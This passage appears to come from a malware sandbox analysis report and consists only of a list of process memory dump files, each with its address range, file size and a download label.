                                                                                                                                                          • memory/1980-196-0x0000000004A00000-0x0000000004A01000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2008-206-0x0000000000430000-0x0000000000432000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            8KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2008-194-0x00000000002F0000-0x00000000002F1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2008-199-0x00000000001C0000-0x00000000001C1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2008-205-0x00000000004B0000-0x00000000004E2000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            200KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2008-207-0x00000000002C0000-0x00000000002C1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2024-163-0x00000000001D0000-0x00000000001D1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2124-308-0x0000000004D50000-0x0000000008D8C000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            64.2MB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2124-309-0x0000000000400000-0x000000000443C000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            64.2MB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2368-286-0x0000000004A90000-0x0000000008AB9000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            64.2MB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2368-278-0x0000000000400000-0x0000000004429000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            64.2MB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2368-270-0x0000000004430000-0x0000000004494000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            400KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2396-296-0x0000000000240000-0x0000000000268000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            160KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2396-297-0x0000000000290000-0x00000000002D7000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            284KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2404-282-0x0000000004970000-0x0000000004A0D000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            628KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2404-269-0x0000000004900000-0x0000000004964000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            400KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2404-275-0x0000000000400000-0x000000000442B000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            64.2MB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2416-259-0x0000000000400000-0x00000000043D1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            63.8MB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2416-251-0x0000000000240000-0x000000000026F000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            188KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2440-260-0x0000000000C00000-0x0000000000C01000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2448-261-0x0000000000490000-0x0000000000491000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2456-283-0x0000000000400000-0x00000000047F2000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            67.9MB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2456-273-0x0000000005040000-0x0000000009432000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            67.9MB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2464-253-0x0000000005080000-0x0000000005081000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2484-299-0x0000000000A20000-0x0000000000A21000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2500-287-0x0000000004B60000-0x0000000004B61000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2500-307-0x000000007EF30000-0x000000007EF31000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2500-288-0x0000000004B62000-0x0000000004B63000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2636-313-0x0000000076C20000-0x0000000076C21000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2636-312-0x0000000004FF0000-0x0000000004FF1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2656-298-0x0000000000400000-0x000000000044F000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            316KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2728-257-0x0000000000770000-0x0000000000782000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            72KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2728-255-0x00000000003F0000-0x0000000000400000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2860-268-0x0000000000870000-0x0000000000871000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2868-281-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/2960-294-0x0000000000720000-0x0000000000721000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/3064-271-0x0000000002170000-0x0000000002271000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            1.0MB

                                                                                                                                                            Download

                                                                                                                                                          • memory/3064-289-0x0000000000AB0000-0x0000000000B0D000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            372KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/3332-314-0x0000000004B50000-0x0000000004B51000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/3332-315-0x0000000004B52000-0x0000000004B53000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download